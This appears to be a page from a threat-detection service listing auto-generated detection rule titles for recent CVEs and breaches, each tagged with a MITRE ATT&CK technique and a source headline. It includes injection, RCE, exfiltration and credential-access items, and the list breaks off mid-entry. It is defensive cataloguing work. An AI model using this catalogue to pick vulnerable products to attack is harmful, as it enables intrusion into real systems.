🛡️ 1 more rules via /detect
Lapsus Group Data Exfiltration - Checkmarx Breach
Breach IntelT1048 — Exfiltration
Auto-generated from Lapsus Group Claims Checkmarx Breach, Dumps 100GB of Data
🛡️ 2 more rules via /detect
Technitium DNS Server Cyclic Delegation Amplification - CVE-2026-42255
🌐 NVDT1595.002 — Discovery
Auto-generated from Technitium DNS Server Vulnerability Allows DNS Amplificat...
🛡️ 1 more rules via /detect
Purrlend Insider Code Modification
Breach IntelT1083 — Discovery
Auto-generated from Purrlend Suffers $1.5M Crypto Heist, Insider Suspected
🛡️ 2 more rules via /detect
CVE-2026-7002: KLiK SocialMediaWebsite SQLi in get_message_ajax.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7002: KLiK SocialMediaWebsite SQLi Poses Remote ...
🛡️ 2 more rules via /detect
RITUALS Data Breach - Customer PII Exfiltration
Breach IntelT1040 — Collection
Auto-generated from Rituals Cosmetics Suffers Data Breach, Customer PII Exposed
🛡️ 2 more rules via /detect
Linksys MR9600 OS Command Injection via BTRequestGetSmartConnectStatus - CVE-2026-6992
🌐 NVDT1190 — Initial Access
Auto-generated from Linksys MR9600 RCE: Critical OS Command Injection Vulnera...
🛡️ 1 more rules via /detect
CVE-2026-6988 Tenda HG10 Router formRouting Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda HG10 Router Buffer Overflow (CVE-2026-6988) Exposes...
🛡️ 1 more rules via /detect
CVE-2026-6987: PicoClaw Web Launcher Command Injection via /api/gateway/restart
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6987: PicoClaw Web Launcher Command Injection
🛡️ 2 more rules via /detect
CVE-2026-6980: GitPilot-MCP repo_path Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6980: Divyanshu-hash GitPilot-MCP Command Injection
🛡️ 2 more rules via /detect
CVE-2026-6977: Vanna-AI Legacy Flask API Unauthorized Access Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6977: Vanna-AI Legacy Flask API Improper Authori...
🛡️ 2 more rules via /detect
CVE-2026-6951 - SimpleGit RCE via --config option
🌐 NVDT1059.004 — Execution
Auto-generated from simple-git RCE: Incomplete Fix Leaves Critical Vulnerabil...
🛡️ 2 more rules via /detect
ShinyHunters Data Exfiltration via Web Server - ADT Breach
Breach IntelT1041 — Exfiltration
Auto-generated from ADT Confirms Data Breach After ShinyHunters Extortion Threat
🛡️ 2 more rules via /detect
CVE-2026-42171: NSIS Privilege Escalation via Low IL Temp Directory
🌐 NVDT1574.002 — Privilege Escalation
Auto-generated from CVE-2026-42171: NSIS Privilege Escalation Vulnerability
🛡️ 2 more rules via /detect
npm Wormable Malware Execution
Breach IntelT1059.003 — Execution
Auto-generated from npm Supply Chain Evolves: Wormable Malware, CI/CD Persist...
🛡️ 2 more rules via /detect
CVE-2026-41478 Saltcorn SQL Injection via Mobile Sync
🌐 NVDT1190 — Initial Access
Auto-generated from Saltcorn SQL Injection (CVE-2026-41478) Exposes Sensitive...
🛡️ 2 more rules via /detect
CVE-2026-41248: Clerk Auth Bypass via Crafted Request
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41248: Clerk Auth Bypass Exposes Critical Web Ap...
🛡️ 2 more rules via /detect
Dgraph Unauthenticated Admin Token Exposure via /debug/vars - CVE-2026-41492
🌐 NVDT1190 — Initial Access
Auto-generated from Dgraph CVE-2026-41492: Unauthenticated Admin Token Exposu...
🛡️ 2 more rules via /detect
CVE-2026-41421: SiYuan Desktop RCE via HTML Notification Abuse
🌐 NVDT1059.001 — Execution
Auto-generated from CVE-2026-41421: SiYuan Desktop RCE via HTML Notification ...
🛡️ 2 more rules via /detect
CVE-2026-41419 - 4ga Boards Path Traversal for File Import
🌐 NVDT1190 — Initial Access
Auto-generated from 4ga Boards Path Traversal Vulnerability Exposes Local Fil...
🛡️ 2 more rules via /detect
CVE-2026-41414: Skim Fuzzy Finder PR from Fork Triggering Cargo Run
🌐 NVDT1059.003 — Execution
Auto-generated from CVE-2026-41414: Skim Fuzzy Finder Vulnerability Exposes G...
🛡️ 2 more rules via /detect
CVE-2026-41328: Dgraph Unauthenticated Data Read via /alter and /mutate
🌐 NVDT1190 — Initial Access
Auto-generated from Dgraph CVE-2026-41328: Unauthenticated Data Read Access C...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-41327
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41327: Dgraph GraphQL Database Critical Unauthen...
🛡️ 3 more rules via /detect
CVE-2026-33666: Zserio BitStreamReader readBytes Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-33666: Zserio BitStreamReader Overflow Bypasses ...
🛡️ 2 more rules via /detect
CVE-2026-33662: OP-TEE RSA Padding Underflow Crash Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-33662: OP-TEE RSA Padding Underflow Leads to Crash
🛡️ 1 more rules via /detect
CVE-2026-33524 - Zserio Crafted Payload Memory Allocation
🌐 NVDT1499 — Impact
Auto-generated from Zserio DoS: Crafted Payload Triggers Massive Memory Alloc...
🛡️ 2 more rules via /detect
ADT Customer Data Exfiltration via Web Server
Breach IntelT1041 — Exfiltration
Auto-generated from ADT Customer Data Stolen in Cyber Intrusion
🛡️ 2 more rules via /detect
CVE-2026-42035: Axios Prototype Pollution to Header Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Axios CVE-2026-42035: Prototype Pollution Leads to Header...
🛡️ 2 more rules via /detect
CVE-2026-42033: Axios Prototype Pollution - Suspicious JSON Response Modification
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42033: Axios Prototype Pollution Allows Response...
🛡️ 2 more rules via /detect
AWS Cognito User Pool Privilege Escalation via UpdateUserAttributes - CVE-2026-6912
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from AWS Cognito Flaw Grants Deployment Admin Privileges
🛡️ 2 more rules via /detect
CVE-2026-6911: Unauthenticated JWT Bypass for Admin Access
🌐 NVDT1190 — Initial Access
Auto-generated from Critical JWT Bypass in AWS Ops Wheel Grants Admin Access
🛡️ 2 more rules via /detect
Detect lxml XML External Entity (XXE) File Read Attempt - CVE-2026-41066
🌐 NVDT1190 — Initial Access
Auto-generated from lxml XML Parsing Vulnerability Exposes Local Files
🛡️ 2 more rules via /detect
CVE-2026-40897 - Math.js Expression Parser RCE via eval
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in Math.js Expression Parser (CVE-2026-40897)
🛡️ 2 more rules via /detect
CVE-2026-39920 - BridgeHead FileStore Axis2 Default Credentials RCE
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in BridgeHead FileStore via Default Axis2 Cr...
🛡️ 3 more rules via /detect
China Targets NASA - Spear Phishing Lure
Breach IntelT1566.001 — Initial Access
Auto-generated from China Targets NASA with Phishing for Defense Software
🛡️ 2 more rules via /detect
CVE-2026-5367 - OVN DHCPv6 Out-of-Bounds Read
🌐 NVDT1190 — Initial Access
Auto-generated from OVN Out-of-Bounds Read Exposes Heap Memory via DHCPv6
🛡️ 2 more rules via /detect
Azure IoT Central Sensitive Data Exposure and Privilege Escalation - CVE-2026-21515
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Azure IoT Central Flaw Exposes Sensitive Data, A...
🛡️ 1 more rules via /detect
SonicWall VPN Exploitation - Initial Access
Breach IntelT1190 — Initial Access
Auto-generated from Ransomware Costs Spike: VPNs and SonicWall Exploited
🛡️ 2 more rules via /detect
Exploit CrowdStrike LogScale Vulnerability
Breach IntelT1190 — Initial Access
Auto-generated from Critical Flaws Hit CrowdStrike, Tenable Products; Patches...
🛡️ 2 more rules via /detect
Tropic Trooper SumatraPDF Execution with Suspicious Child Process
Breach IntelT1204.002 — Execution
Auto-generated from Tropic Trooper Exploits SumatraPDF and VS Code Tunnels fo...
🛡️ 2 more rules via /detect
Tempo Large Limit Query Denial of Service - CVE-2026-21728
🌐 NVDT1499 — Impact
Auto-generated from Tempo Vulnerability: High-Severity Flaw Risks Service Ava...
🛡️ 1 more rules via /detect
CVE-2026-1952 - Delta AS320T Undocumented Subfunction DoS
🌐 NVDT1499 — Impact
Auto-generated from Delta Electronics AS320T Plagued by Critical DoS Vulnerab...
CVE-2026-1951 - Delta AS320T PLC Directory Traversal Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Buffer Overflow in Delta Electronics AS320T PLC
Web Application Exploitation Attempt — CVE-2026-1950
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Buffer Overflow Hits Delta Electronics AS320T
🛡️ 2 more rules via /detect
CVE-2026-5364 - WordPress Drag and Drop File Upload Arbitrary File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Flaw Exposes Sites to RCE
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-1949
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in Delta Electronics AS320T Industrial Contr...
🛡️ 2 more rules via /detect
Fraudulent Kindle Unlimited Page Reads - AI Book Scheme
Breach IntelT1190 — Exploitation of Vulnerability
Auto-generated from AI-Generated 'Books' Exploit Amazon's Kindle Unlimited, G...
🛡️ 2 more rules via /detect
D-Link DWM-222W Brute-Force Bypass Attempt - Free Tier
🌐 NVDT1110.001 — Credential Access
Auto-generated from D-Link DWM-222W Wi-Fi Adapter Vulnerable to Brute-Force B...
🛡️ 1 more rules via /detect
CVE-2026-41485: Kyverno Policy Engine CrashLoopBackOff via Unchecked Type Assertion
🌐 NVDT1499 — Impact
Auto-generated from Kyverno Policy Engine Flaw: Cluster Crash and Admission C...
🛡️ 1 more rules via /detect
Node.js basic-ftp Client DoS via Malicious Listing - CVE-2026-41324
🌐 NVDT1499 — Impact
Auto-generated from Node.js FTP Clients Exposed to DoS via Malicious Listings
🛡️ 1 more rules via /detect
CVE-2026-41323: Kyverno apiCall Outbound HTTP Request to Malicious Server
🌐 NVDT1557.001 — Lateral Movement
Auto-generated from Kyverno API Call Vulnerability Exposes Kubernetes Clusters
🛡️ 2 more rules via /detect
Kyverno RBAC Bypass via ConfigMap Read - CVE-2026-41068
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Kyverno Privilege Escalation: RBAC Bypass in Multi-Tenant...
🛡️ 2 more rules via /detect
RCE via ERB Deserialization - CVE-2026-41316
🌐 NVDT1190 — Initial Access
Auto-generated from Ruby ERB Deserialization Flaw Allows Code Execution
🛡️ 2 more rules via /detect
CVE-2026-41309 - OSSN Malicious Image Upload for DoS
🌐 NVDT1190 — Initial Access
Auto-generated from OSSN Resource Exhaustion: DoS Risk from Malicious Image U...
🛡️ 2 more rules via /detect
CVE-2026-33318 - Actual Finance Tool Local Admin Escalation via OIDC Migration Flaw
🌐 NVDT1548.003 — Privilege Escalation
Auto-generated from Actual Finance Tool: Local Admin Escalation via OIDC Migr...
🛡️ 1 more rules via /detect
CVE-2026-33317 OP-TEE PKCS#11 Out-of-Bounds Read
🌐 NVDT1204.002 — Privilege Escalation
Auto-generated from OP-TEE Vulnerability Exposes TrustZone to OOB Reads, Crashes
🛡️ 2 more rules via /detect
ShinyHunters Phishing Account Compromise - Mariner Society
Breach IntelT1190 — Initial Access
Auto-generated from Carnival Breach: ShinyHunters Exposes 7.5M Loyalty Progra...
🛡️ 2 more rules via /detect
CVE-2026-40630: SenseLive X3050 Unauthorized Configuration Access
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Flaw in SenseLive X3050 Exposes Sensitive Config...
🛡️ 2 more rules via /detect
CVE-2026-40623: SenseLive X3050 Critical Configuration Bypass via Web Interface
🌐 NVDT1190 — Initial Access
Auto-generated from SenseLive X3050 Vulnerability: Critical Configuration Bypass
🛡️ 2 more rules via /detect
CVE-2026-40620: Unauthenticated Admin Access to SenseLive X3050 Management Service
🌐 NVDT1190 — Initial Access
Auto-generated from SenseLive X3050: Critical Unauthenticated Admin Access
🛡️ 2 more rules via /detect
CVE-2026-39462: SenseLive X3050 Web Interface Password Reset Failure
🌐 NVDT1190 — Initial Access
Auto-generated from SenseLive X3050: Password Changes Failing After Reset
🛡️ 1 more rules via /detect
CVE-2026-35503: SenseLive X3050 Client-Side Auth Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from SenseLive X3050 Critical Vulnerability: Client-Side Auth ...
🛡️ 1 more rules via /detect
Unauthenticated Management Interface Discovery - CVE-2026-35064
🌐 NVDT1595.002 — Reconnaissance
Auto-generated from SenseLive X3050 Vulnerability Exposes Management Interfac...
🛡️ 2 more rules via /detect
CVE-2026-31952 - Xibo CMS SQL Injection in DataSet Filtering
🌐 NVDT1190 — Initial Access
Auto-generated from Xibo Digital Signage Platform Hit with Critical SQL Injec...
🛡️ 2 more rules via /detect
CVE-2026-27843: SenseLive X3050 Unauthenticated Configuration Modification
🌐 NVDT1190 — Initial Access
Auto-generated from SenseLive X3050 Critical Vulnerability: Persistent Lockou...
🛡️ 2 more rules via /detect
CVE-2026-27841 - SenseLive X3050 Unauthenticated Configuration Change via CSRF
🌐 NVDT1190 — Initial Access
Auto-generated from SenseLive X3050 CSRF Vulnerability: High Risk Remote Conf...
🛡️ 2 more rules via /detect
CVE-2026-25775 - Unauthenticated Firmware Update Request
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Unauthenticated Firmware Flaws in SenseLive X3050
🛡️ 2 more rules via /detect
CVE-2026-41355: OpenShell Mirror Mode Arbitrary Code Execution via Workspace Hook
🌐 NVDT1190 — Initial Access
Auto-generated from OpenShell Mirror Mode Allows Arbitrary Code Execution
🛡️ 2 more rules via /detect
OpenClaw Access Control Bypass via Profile Mutation - CVE-2026-41353
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw: High-Severity Access Control Bypass Looms
🛡️ 1 more rules via /detect
OpenClaw RCE - Arbitrary Command Execution via Paired Node Bypass - CVE-2026-41352
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw RCE: Paired Nodes Bypass Auth, Allow Arbitrary C...
🛡️ 2 more rules via /detect
OpenClaw Agentic Consent Bypass via config.patch - CVE-2026-41349
🌐 NVDT1539 — Defense Evasion
Auto-generated from OpenClaw LLM Agent Bypass: Silent Execution Approval Disa...
🛡️ 2 more rules via /detect
OpenClaw CSRF to Unauthorized Action - CVE-2026-41347
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw CSRF Vulnerability: High-Severity Risk in Truste...
🛡️ 2 more rules via /detect
OpenClaw Remote Onboarding Authentication Bypass Attempt - CVE-2026-41342
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw Authentication Bypass Poses Remote Onboarding Risk
🛡️ 2 more rules via /detect
CVE-2026-41336: OpenClaw Arbitrary Code Execution via .env Override
🌐 NVDT1204.002 — Execution
Auto-generated from OpenClaw Vulnerability: Arbitrary Code Execution via .env...
🛡️ 2 more rules via /detect
Microsoft Entra ID Entitlement Management SSRF - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SSRF in Microsoft Entra ID Entitlement Management
🛡️ 2 more rules via /detect
CVE-2026-33819 - Microsoft Bing Deserialization RCE Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Deserialization RCE in Microsoft Bing (CVE-2026-...
🛡️ 2 more rules via /detect
M365 Copilot Open Redirect to Malicious Site - CVE-2026-33102
🌐 NVDT1190 — Initial Access
Auto-generated from M365 Copilot Critical Open Redirect Allows Privilege Esca...
🛡️ 1 more rules via /detect
Microsoft Dynamics 365 SSRF via specific parameter - CVE-2026-32210
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SSRF in Microsoft Dynamics 365 Poses Spoofing Risk
🛡️ 2 more rules via /detect
CVE-2026-32172 - Microsoft Power Apps Uncontrolled Search Path Element RCE
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Power Apps Vulnerability Allows Remote Code Exe...
🛡️ 2 more rules via /detect
KTransformers Unsafe Deserialization via ZMQ - CVE-2026-26210
🌐 NVDT1574.002 — Execution
Auto-generated from Critical KTransformers Unsafe Deserialization Vulnerabili...
🛡️ 2 more rules via /detect
CVE-2026-26150 Microsoft Purview SSRF - Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Purview SSRF: Privilege Escalation Risk
🛡️ 2 more rules via /detect
CVE-2026-24303 - Microsoft Partner Center Privilege Escalation via Improper Access Control
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Critical Privilege Escalation in Microsoft Partner Center
🛡️ 2 more rules via /detect
Breeze Cache Unauthenticated File Upload
Breach IntelT1190 — Initial Access
Auto-generated from Breeze Cache Plugin Exploit: Unauthenticated File Upload ...
🛡️ 2 more rules via /detect
CVE-2026-6942 - radare2-mcp JSON-RPC Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Flaw in radare2-mcp: Command Injection via J...
🛡️ 2 more rules via /detect
CVE-2026-6940 - Radare2 Arbitrary Directory Deletion via Path Traversal
🌐 NVDT1485 — Impact
Auto-generated from Radare2 Path Traversal Flaw: Local Attackers Can Delete A...
🛡️ 2 more rules via /detect
Flowise SSRF Bypass via DNS Rebinding - Free Tier - CVE-2026-41272
🌐 NVDT1190 — Initial Access
Auto-generated from Flowise SSRF Bypass: DNS Rebinding Opens LLM Flows to Att...
🛡️ 2 more rules via /detect
CVE-2026-41271 - Flowise SSRF via API Chain Components
🌐 NVDT1190 — Initial Access
Auto-generated from Flowise SSRF Vulnerability Exposes Internal Systems
🛡️ 2 more rules via /detect
Flowise SSRF Bypass via Custom Function - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Flowise SSRF Bypass: Internal Network at Risk
🛡️ 2 more rules via /detect
CVE-2026-41269 - Flowise Malicious JavaScript Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Flowise RCE via Malicious JavaScript Uploads
🛡️ 2 more rules via /detect
Flowise RCE via FILE-STORAGE parameter override - CVE-2026-41268
🌐 NVDT1190 — Initial Access
Auto-generated from Flowise RCE: Unauthenticated Command Execution
🛡️ 2 more rules via /detect
CVE-2026-41267 - Flowise Cloud Account Registration JSON Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Flowise Cloud Vulnerability Exposes Multi-Tenant Environm...
🛡️ 1 more rules via /detect
CVE-2026-41138 - Flowise AirtableAgent RCE via Pandas
🌐 NVDT1059.006 — Execution
Auto-generated from Flowise RCE: Unchecked Input Leads to Code Execution
🛡️ 2 more rules via /detect
Contour Cookie Rewrite Lua Code Injection - CVE-2026-41246
🌐 NVDT1190 — Initial Access
Auto-generated from Contour Kubernetes Ingress: Lua Code Injection Leads to E...
🛡️ 2 more rules via /detect
CVE-2026-41241 - Pretalx Organizer Search XSS via Submission Title
🌐 NVDT1190 — Initial Access
Auto-generated from Pretalx XSS: Organizer Search Exposes User Data
🛡️ 2 more rules via /detect
Argo Workflows Crash Loop via Malformed Annotation - CVE-2026-40886
🌐 NVDT1499 — Impact
Auto-generated from Argo Workflows Crash Loop: Malformed Annotation Halts Pro...
🛡️ 1 more rules via /detect
Backdoor FIRESTARTER Activity on Cisco Device
Breach IntelT1070 — Defense Evasion
Auto-generated from CISA Breach: Cisco Vulnerability Led to Persistent Backdoor
🛡️ 2 more rules via /detect
Firefox/Tor Browser IndexedDB Enumeration for Fingerprinting
Breach IntelT1056.001 — Collection
Auto-generated from Firefox and Tor Browser Uniquely Vulnerable to Stable Ide...
🛡️ 2 more rules via /detect
Chrome for Android GPU Out-of-Bounds Read Sandbox Escape Attempt - CVE-2026-6920
🌐 NVDT1190 — Initial Access
Auto-generated from Chrome on Android GPU Vulnerability Allows Sandbox Escape
🛡️ 1 more rules via /detect
Bitwarden CLI npm Package Supply Chain Compromise
Breach IntelT1190 — Initial Access
Auto-generated from Bitwarden CLI npm Package Briefly Compromised in Supply C...
🛡️ 2 more rules via /detect
CVE-2026-40472 - Malicious .cabal Metadata XSS in hackage-server
🌐 NVDT1190 — Initial Access
Auto-generated from Critical XSS in hackage-server via Malicious .cabal Metadata
🛡️ 2 more rules via /detect
Suspicious Hackage Server Package Upload Attempt - CVE-2026-40471
🌐 NVDT1190 — Initial Access
Auto-generated from Critical CSRF Flaw in hackage-server Poses Supply Chain Risk
🛡️ 2 more rules via /detect
Hackage Server XSS - Malicious HTML/JS Served - CVE-2026-40470
🌐 NVDT1190 — Initial Access
Auto-generated from Critical XSS in Hackage Server Exposes User Sessions
🛡️ 2 more rules via /detect
CVE-2026-34003 - X.Org XKB Key Type Request Out-of-Bounds Access
🌐 NVDT1059.004 — Execution
Auto-generated from X.Org X Server Flaw: Local Attackers Exploit OOB Memory A...
🛡️ 2 more rules via /detect
X.Org Server Use-After-Free - miSyncTriggerFence() Crash - CVE-2026-34001
🌐 NVDT1499 — Privilege Escalation
Auto-generated from X.Org Server Flaw: Use-After-Free Threatens Linux Desktops
🛡️ 1 more rules via /detect
CVE-2026-33999 X.Org XKB Compatibility Map Underflow RCE
🌐 NVDT1068 — Privilege Escalation
Auto-generated from X.Org Server Underflow: Local RCE and DoS Risk
🛡️ 1 more rules via /detect
CVE-2026-23751 - Kofax Capture Unauthenticated .NET Remoting Access
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Kofax Capture RCE Vulnerability: Unauthenticated...
🛡️ 3 more rules via /detect
CVE-2025-62373 - Pipecat LivekitFrameSerializer Pickle Deserialization RCE
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in Pipecat Python Framework: CVE-2025-62373
🛡️ 2 more rules via /detect
Checkmarx KICS Compromised Docker Image Execution
Breach IntelT1595.002 — Discovery
Auto-generated from Checkmarx KICS Supply Chain Compromise Exposes Developer ...
🛡️ 2 more rules via /detect
GopherWhisper APT - Slack/Discord C2 Communication
Breach IntelT1071.004 — Command and Control
Auto-generated from China-Linked GopherWhisper APT Targets Mongolian Governme...
🛡️ 2 more rules via /detect
Supply Chain Compromise - Bitwarden CLI Malicious Script Execution
Breach IntelT1059.003 — Execution
Auto-generated from Bitwarden CLI Compromised in Checkmarx Supply Chain Attack
🛡️ 2 more rules via /detect
CVE-2026-39440 - FunnelFormsPro Code Injection via unserialize
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Code Injection Flaw in FunnelFormsPro Exposes Re...
🛡️ 2 more rules via /detect
UK Biobank Data Listed for Sale on Alibaba
Breach IntelT1537 — Impact
Auto-generated from UK Biobank Data Leaked, Found on Chinese E-commerce Site
🛡️ 2 more rules via /detect
Suspicious Download of Checkmarx Related Software Packages
🇮🇱 INCD IntelT1195 — Initial Access
Auto-generated from Supply Chain Attack Targets Checkmarx Software Packages
Privilege Escalation via Microsoft Defender Zero-Day (BlueHammer)
Breach IntelT1068 — Privilege Escalation
Auto-generated from CISA Mandates Patching of Zero-Day Microsoft Defender Flaw
🛡️ 2 more rules via /detect
RITUALS Data Exfiltration - Customer PII
Breach IntelT1041 — Exfiltration
Auto-generated from Luxury Cosmetics Giant Rituals Discloses Data Breach
🛡️ 2 more rules via /detect
CVE-2026-6903 - LabOne Web Server Arbitrary File Read
🌐 NVDT1190 — Initial Access
Auto-generated from LabOne Web Server Suffers Arbitrary File Read Flaw
🛡️ 2 more rules via /detect
CVE-2026-6887 - Borg SPM 2007 SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SQL Injection in End-of-Life Borg SPM 2007
🛡️ 2 more rules via /detect
CVE-2026-6886 - Borg SPM 2007 Authentication Bypass via Crafted Request
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Authentication Bypass in End-of-Life Borg SPM 2007
🛡️ 1 more rules via /detect
CVE-2026-6885 - Borg SPM 2007 Arbitrary File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Borg SPM 2007 Vulnerability Allows Unauthenticat...
🛡️ 2 more rules via /detect
CVE-2026-5464 - ExactMetrics Plugin Arbitrary Plugin Installation
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Flaw Allows Arbitrary Plugin Installatio...
🛡️ 2 more rules via /detect
GopherWhisper APT - Suspicious Go Binary Execution
Breach IntelT1059.001 — Execution
Auto-generated from GopherWhisper APT Targets Mongolian Government with Go Ba...
🛡️ 2 more rules via /detect
Vercel Customer Account Access via Context.ai Breach
Breach IntelT1078.004 — Credential Access
Auto-generated from Vercel Confirms Additional Customer Accounts Compromised ...
🛡️ 2 more rules via /detect
Zero-Day Microsoft Defender SAM Access - Free Tier
Breach IntelT1003 — Credential Access
Auto-generated from Zero-Day Flaw in Microsoft Defender Leveraged by Attackers
🛡️ 2 more rules via /detect
GROWI ReDoS Exploit Attempt - CVE-2026-41040
🌐 NVDT1499 — Impact
Auto-generated from GROWI ReDoS Vulnerability (CVE-2026-41040) Poses High DoS...
🛡️ 1 more rules via /detect
CVE-2026-34488 - Insecure DLL Loading via IP Setting Software
🌐 NVDT1574.002 — Persistence
Auto-generated from IP Setting Software Vulnerability Allows Arbitrary Code E...
🛡️ 2 more rules via /detect
Physical Manipulation Spoofs Temperature Data
Breach IntelT1190 — Initial Access
Auto-generated from Physical Manipulation Spoofs Data for $34,000 Payout
🛡️ 2 more rules via /detect
Suspicious Network Device Reboot/Offline Event
Breach IntelT1565 — Impact
Auto-generated from Iran Claims US Exploited Network Gear Backdoors
🛡️ 2 more rules via /detect
Froxlor DataDump.add() Arbitrary Directory Chown - CVE-2026-41231
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Froxlor Vulnerability Grants Root Ownership of Arbitrary ...
🛡️ 2 more rules via /detect
CVE-2026-41230 - Froxlor Arbitrary DNS Record Injection
🌐 NVDT1505.003 — Persistence
Auto-generated from Froxlor Critical Flaw Allows Arbitrary DNS Record Injection
🛡️ 2 more rules via /detect
CVE-2026-41229 - Froxlor Unsanitized Admin Input for MySQL Server Settings
🌐 NVDT1190 — Initial Access
Auto-generated from Froxlor Critical RCE: Unsanitized Admin Input Leads to Pe...
🛡️ 2 more rules via /detect
CVE-2026-41228 - Froxlor Authenticated Path Traversal in Language Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Froxlor Bug: Authenticated Code Execution via La...
🛡️ 2 more rules via /detect
Apple iOS/iPadOS Notification Data Persistence Vulnerability
Breach IntelT1560.001 — Defense Evasion
Auto-generated from Apple Patches Critical Notification Data Leak Vulnerability
🛡️ 2 more rules via /detect
CVE-2026-3844 - Breeze Cache Arbitrary File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Flaw in Breeze Cache WordPress Plugin
🛡️ 2 more rules via /detect
CVE-2026-41679 - Paperclip Unauthenticated RCE via API Call Chain
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in Paperclip AI Orchestration Platform (CVE-...
🛡️ 2 more rules via /detect
CVE-2026-41208: Paperclip Agent Privilege Escalation via adapterConfig
🌐 NVDT1059.004 — Privilege Escalation
Auto-generated from CVE-2026-41208: Paperclip AI Agent Privilege Escalation t...
🛡️ 2 more rules via /detect
Web Shell Activity Detection — CVE-2026-41180
🌐 NVDT1505.003 — Persistence
Auto-generated from PsiTransfer RCE: Unauthenticated Code Execution via Path ...
🛡️ 4 more rules via /detect
CVE-2026-5935 - IBM Storage Console Unauthenticated RCE via Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from IBM Storage Console Flaw: Unauthenticated RCE Risk
🛡️ 2 more rules via /detect
Ziostation2 Path Traversal for OS Info Disclosure - CVE-2026-40062
🌐 NVDT1190 — Initial Access
Auto-generated from Ziostation2 Path Traversal Exposes Sensitive OS Info
🛡️ 1 more rules via /detect
CVE-2026-3621 - IBM WebSphere Liberty Identity Spoofing - Unauthenticated Application Access
🌐 NVDT1190 — Initial Access
Auto-generated from IBM WebSphere Liberty Identity Spoofing: High-Severity Vu...
🛡️ 2 more rules via /detect
CVE-2026-32679: Suspicious DLL Load by LiveOn Meet Installer
🌐 NVDT1574.001 — Persistence
Auto-generated from CVE-2026-32679: DLL Hijacking in LiveOn Meet and Canon Ca...
🛡️ 1 more rules via /detect
WeKan SSRF - Unrestricted Webhook URL Schema - CVE-2026-41455
🌐 NVDT1190 — Initial Access
Auto-generated from WeKan SSRF Vulnerability: Internal Network Exposure Risk
🛡️ 2 more rules via /detect
CVE-2026-41454 - WeKan Integration API Admin Actions
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from Wekan API Flaw Grants Board Members Admin Powers
🛡️ 2 more rules via /detect
CVE-2026-41175 Statamic CMS API Data Deletion via Query Parameter Manipulation
🌐 NVDT1190 — Initial Access
Auto-generated from Statamic CMS Vulnerability Allows Data Deletion via API M...
🛡️ 2 more rules via /detect
CVE-2026-40517 - Radare2 Command Injection via Malicious PDB
🌐 NVDT1059.004 — Execution
Auto-generated from Radare2 Command Injection: Malicious PDB Files Execute OS...
🛡️ 2 more rules via /detect
Jellystat SQLi to RCE via COPY TO PROGRAM - CVE-2026-41167
🌐 NVDT1190 — Initial Access
Auto-generated from Jellystat SQLi to RCE Critical Vulnerability (CVE-2026-41...
🛡️ 2 more rules via /detect
CVE-2026-41166 - OpenRemote Master Realm Privilege Escalation via Manager API
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from OpenRemote Privilege Escalation: Master Realm at Risk
🛡️ 1 more rules via /detect
CVE-2026-40937 - RustFS Notification Target Overwrite (Free Tier)
🌐 NVDT1531 — Impact
Auto-generated from RustFS Flaw: Non-Admin Takeover of Notification Targets
🛡️ 2 more rules via /detect
CVE-2026-33733 - EspoCRM Admin Path Traversal File Read/Write
🌐 NVDT1087.001 — Privilege Escalation
Auto-generated from EspoCRM Path Traversal: Admin Creds Lead to Arbitrary Fil...
🛡️ 2 more rules via /detect
CVE-2026-33656 - EspoCRM Path Traversal to Arbitrary File Write
🌐 NVDT1190 — Initial Access
